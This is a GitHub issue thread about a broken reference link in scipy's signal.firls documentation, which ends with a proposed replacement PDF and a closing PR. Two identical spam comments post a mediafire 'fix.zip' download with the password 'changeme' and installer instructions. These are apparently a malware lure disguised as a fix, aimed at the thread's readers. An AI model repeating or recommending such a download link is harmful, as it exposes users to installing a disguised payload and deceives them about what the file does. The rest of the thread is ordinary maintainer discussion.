### ISSUE TITLE
DOC: signal.firls: reference unavailable

### ISSUE THREAD

**Issue by artpelling** [scipy/scipy#21452]
The literature reference in `scipy.signal.firls`:

https://github.com/scipy/scipy/blob/92d2a8592782ee19a1161d0bf3fc2241ba78bb63/scipy/signal/_fir_filter_design.py#L909

is unavailable. The link is not dead but it seems like the source is gone. Maybe
```
https://eeweb.engineering.nyu.edu/iselesni/EL713/firls/firls.pdf
```
is the correct document (not sure) and could be used as replacement.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ilayn** [comment]
The link is dead indeed and CNX redirects wayback machine. So probably we need to remove that link completely.

**Comment by doshi-kevin** [comment]
Hey @ilayn , could you please assign this issue to me. Although, I will start working on this immediately and contribute to the project.

**Comment by lucascolley** [comment]
Hi @doshi-kevin , what is your proposed solution to the issue?

**Comment by doshi-kevin** [comment]
Hey @lucascolley ,i would first remove the broken link, find a suitable replacement, update the documentation, ensure that the references mentioned in old link are updated or removed and lastly commit.

**Comment by lucascolley** [comment]
Okay, sounds good @doshi-kevin ! Feel free to submit a PR!

**Comment by doshi-kevin** [comment]
Hey @lucascolley , even I tries searching on the net for the publication but the only possible link is the one mentioned in the comments. Other one is just a citing 'Selesnick, I., & Burrus, C. S. (1997). Design of FIR digital filters. In V. K. Madessetti, & D. B. Williams (Eds.), The digital signal processing handbook CRC Press.' from NYU scholars. So I guess I will have to add 'https://eeweb.engineering.nyu.edu/iselesni/EL713/firls/firls.pdf' this link as a replacement .

**Comment by lucascolley** [comment]
closed by gh-21458
